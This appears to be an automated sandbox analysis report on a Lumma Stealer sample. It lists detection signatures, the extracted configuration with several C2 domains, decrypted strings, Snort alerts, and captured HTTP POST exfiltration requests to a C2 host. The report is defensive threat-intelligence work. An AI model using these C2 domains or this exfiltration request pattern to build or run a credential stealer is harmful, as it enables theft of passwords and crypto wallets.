Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1435406
MD5: 7e37f8c945d005226870e60aa2baea93
SHA1: d8a457a032ead8cc0d692efd497914e8cc69e8a4
SHA256: d130f492c40697a34e2d1e7b1e9a5e3ba37c7f6b4271271fba6b5c1e9048af8b
Tags: exe
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected LummaC Stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 420 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7E37F8C945D005226870E60AA2BAEA93)
    • BitLockerToGo.exe (PID: 7060 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "shatterbreathepsw.shop"], "Build id": "xpsGVF--GEIROPA"}
Source: sslproxydump.pcap
Rule: JoeSecurity_LummaCStealer_3
Description: Yara detected LummaC Stealer
Author: Joe Security

Source: sslproxydump.pcap
Rule: JoeSecurity_LummaCStealer_2
Description: Yara detected LummaC Stealer
Author: Joe Security

Source: 00000005.00000003.2397981986.0000000002E93000.00000004.00000020.00020000.00000000.sdmp
Rule: JoeSecurity_CredentialStealer
Description: Yara detected Credential Stealer
Author: Joe Security

Source: 00000005.00000003.2389056869.0000000002E93000.00000004.00000020.00020000.00000000.sdmp
Rule: JoeSecurity_CredentialStealer
Description: Yara detected Credential Stealer
Author: Joe Security

Source: 00000005.00000003.2483917008.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp
Rule: JoeSecurity_CredentialStealer
Description: Yara detected Credential Stealer
Author: Joe Security

Source: 00000005.00000002.2532039828.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp
Rule: JoeSecurity_CredentialStealer
Description: Yara detected Credential Stealer
Author: Joe Security

Source: 00000000.00000002.2354687188.000000C000326000.00000004.00001000.00020000.00000000.sdmp
Rule: Msfpayloads_msf_9
Description: Metasploit Payloads - file msf.war - contents
Author: Florian Roth
Strings:
  • 0x0:$x1: 4d5a9000030000000
No Sigma rule has matched

Timestamp: 05/02/24-17:04:31.224285
SID: 2052224
Source Port: 49722
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/02/24-17:04:21.147175
SID: 2052224
Source Port: 49718
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/02/24-17:04:21.035950
SID: 2052217
Source Port: 51308
Destination Port: 53
Protocol: UDP
Classtype: A Network Trojan was detected

Timestamp: 05/02/24-17:04:22.766689
SID: 2052224
Source Port: 49719
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/02/24-17:04:32.059166
SID: 2052224
Source Port: 49723
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/02/24-17:04:34.127001
SID: 2052224
Source Port: 49726
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/02/24-17:04:24.741485
SID: 2052224
Source Port: 49720
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/02/24-17:04:32.842406
SID: 2052224
Source Port: 49724
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/02/24-17:04:25.682174
SID: 2052224
Source Port: 49721
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: https://shatterbreathepsw.shop:443/api | Avira URL Cloud: Label: malware
Source: https://shatterbreathepsw.shop/api | Avira URL Cloud: Label: malware
Source: 0.3.file.exe.c00047c000.1.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "shatterbreathepsw.shop"], "Build id": "xpsGVF--GEIROPA"}
Source: shatterbreathepsw.shop | Virustotal: Detection: 17%
Source: tolerateilusidjukl.shop | Virustotal: Detection: 14%
Source: shortsvelventysjo.shop | Virustotal: Detection: 19%
Source: https://shatterbreathepsw.shop:443/api | Virustotal: Detection: 19%
Source: shatterbreathepsw.shop | Virustotal: Detection: 17%
Source: demonstationfukewko.shop | Virustotal: Detection: 20%
Source: https://shatterbreathepsw.shop/0 | Virustotal: Detection: 15%
Source: https://shatterbreathepsw.shop/apiT | Virustotal: Detection: 16%
Source: productivelookewr.shop | Virustotal: Detection: 16%
Source: incredibleextedwj.shop | Virustotal: Detection: 14%
Source: liabilitynighstjsko.shop | Virustotal: Detection: 17%
Source: alcojoldwograpciw.shop | Virustotal: Detection: 20%
Source: https://shatterbreathepsw.shop/api | Virustotal: Detection: 19%
Source: file.exe | ReversingLabs: Detection: 34%
Source: file.exe | Virustotal: Detection: 37%
Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String decryptor: demonstationfukewko.shop
Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String decryptor: liabilitynighstjsko.shop
Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String decryptor: alcojoldwograpciw.shop
Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String decryptor: incredibleextedwj.shop
Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String decryptor: shortsvelventysjo.shop
Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String decryptor: shatterbreathepsw.shop
Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String decryptor: tolerateilusidjukl.shop
Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String decryptor: productivelookewr.shop
Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String decryptor: shatterbreathepsw.shop
Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000003.2265990913.000000C00047C000.00000004.00001000.00020000.00000000.sdmp | String decryptor: xpsGVF--GEIROPA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02D05977 CryptUnprotectData | 5_2_02D05977
Source: unknown | HTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: BitLockerToGo.pdb source: file.exe, 00000000.00000002.2354687188.000000C0002EC000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2354687188.000000C0001D7000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2354687188.000000C000212000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342735024.000001E6FBA50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: file.exe, 00000000.00000002.2354687188.000000C0002EC000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2354687188.000000C0001D7000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2354687188.000000C000212000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342735024.000001E6FBA50000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [esp+20h] | 5_2_02D10352
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov edx, dword ptr [esi+08h] | 5_2_02D0D343
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [esp+08h] | 5_2_02D0633E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 73CEF4DDh | 5_2_02D291A2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ecx, dword ptr [esp+04h] | 5_2_02D07AE2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ebx, eax | 5_2_02CF4BB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [esp+10h] | 5_2_02CFAB00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then lea eax, dword ptr [esp+00000084h] | 5_2_02D05977
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ecx, dword ptr [esp+10h] | 5_2_02CF9E70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov edx, dword ptr [esp+08h] | 5_2_02CF9E70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov word ptr [eax], cx | 5_2_02D13FD5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 18DC7455h | 5_2_02D26CF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ecx, dword ptr [esp+08h] | 5_2_02D05D07
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [esi+20h] | 5_2_02D012DF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ecx, dword ptr [esi+20h] | 5_2_02D012DF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 73CEF4DDh | 5_2_02D292A1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp word ptr [edi+edx], 0000h | 5_2_02D0727D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7A1A689Fh | 5_2_02D27220
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp byte ptr [eax+ecx], 00000000h | 5_2_02D153B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp eax | 5_2_02D133B9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ecx, dword ptr [esi+00000534h] | 5_2_02D163BC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ecx, dword ptr [esi+10h] | 5_2_02D2934E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ecx, dword ptr [esi+00000534h] | 5_2_02D16312
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 5_2_02D230D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h | 5_2_02D0A000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ebx, eax | 5_2_02CF31D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp eax | 5_2_02D121A3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp eax | 5_2_02D1515A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 5C3924FCh | 5_2_02D27110
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp eax | 5_2_02D01114
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp byte ptr [ecx], 00000000h | 5_2_02D026D2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [esi+00000090h] | 5_2_02D186C5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp byte ptr [ebx+eax+01h], 00000000h | 5_2_02D136F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp eax | 5_2_02D2A6E8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [esi+00000090h] | 5_2_02D16644
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [esi+00000090h] | 5_2_02D16647
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edx, byte ptr [esi+edi] | 5_2_02CF2610
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov edx, dword ptr [esp] | 5_2_02D27620
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp byte ptr [edi], 00000000h | 5_2_02D017DE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [esi+04h] | 5_2_02D117EE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov edx, dword ptr [esi+20h] | 5_2_02D047A1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp eax | 5_2_02D2A720
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov edi, eax | 5_2_02CF64E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ecx, dword ptr [esi+00000534h] | 5_2_02D162C8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 0AB35B01h | 5_2_02D03B97
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp eax | 5_2_02D068DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp eax | 5_2_02D068F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 5_2_02D13880
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [esi+00000090h] | 5_2_02D15F0E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov byte ptr [eax], cl | 5_2_02D06983
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov byte ptr [eax], cl | 5_2_02D06983
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then lea ebx, dword ptr [edi+ecx] | 5_2_02D11FA1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov edx, dword ptr [esp+60h] | 5_2_02D14F56
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov byte ptr [ebx], al | 5_2_02D15F13
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp eax | 5_2_02D11CC6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp edx | 5_2_02D0CCF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then inc ebx | 5_2_02D04C00

Networking

Source: Traffic | Snort IDS: 2052217 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (shatterbreathepsw .shop) 192.168.2.6:51308 -> 1.1.1.1:53
Source: Traffic | Snort IDS: 2052224 ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) 192.168.2.6:49718 -> 104.21.95.19:443
Source: Traffic | Snort IDS: 2052224 ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) 192.168.2.6:49719 -> 104.21.95.19:443
Source: Traffic | Snort IDS: 2052224 ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) 192.168.2.6:49720 -> 104.21.95.19:443
Source: Traffic | Snort IDS: 2052224 ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) 192.168.2.6:49721 -> 104.21.95.19:443
Source: Traffic | Snort IDS: 2052224 ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) 192.168.2.6:49722 -> 104.21.95.19:443
Source: Traffic | Snort IDS: 2052224 ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) 192.168.2.6:49723 -> 104.21.95.19:443
Source: Traffic | Snort IDS: 2052224 ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) 192.168.2.6:49724 -> 104.21.95.19:443
Source: Traffic | Snort IDS: 2052224 ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) 192.168.2.6:49726 -> 104.21.95.19:443
Source: Malware configuration extractor | URLs: demonstationfukewko.shop
Source: Malware configuration extractor | URLs: liabilitynighstjsko.shop
Source: Malware configuration extractor | URLs: alcojoldwograpciw.shop
Source: Malware configuration extractor | URLs: incredibleextedwj.shop
Source: Malware configuration extractor | URLs: shortsvelventysjo.shop
Source: Malware configuration extractor | URLs: shatterbreathepsw.shop
Source: Malware configuration extractor | URLs: tolerateilusidjukl.shop
Source: Malware configuration extractor | URLs: productivelookewr.shop
Source: Malware configuration extractor | URLs: shatterbreathepsw.shop
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: shatterbreathepsw.shop
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 56
  Host: shatterbreathepsw.shop
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 12861
  Host: shatterbreathepsw.shop
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 15107
  Host: shatterbreathepsw.shop
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 19965
  Host: shatterbreathepsw.shop
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 3802
  Host: shatterbreathepsw.shop
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 1365
  Host: shatterbreathepsw.shop
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 556486
  Host: shatterbreathepsw.shop
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: shatterbreathepsw.shop
Source: unknown | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: shatterbreathepsw.shop
Source: file.exe | String found in binary or memory: http://.css
Source: file.exe | String found in binary or memory: http://.jpg
Source: BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe | String found in binary or memory: http://html4/loose.dtd
Source: BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: BitLockerToGo.exe, 00000005.00000003.2421315426.000000000526D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe | String found in binary or memory: https://database.usgovcloudapi.net/unsupported
Source: file.exe | String found in binary or memory: https://datalake.azure.net/https://api.loganalytics.iohttps://graph.microsoft.us/https://api.loganal
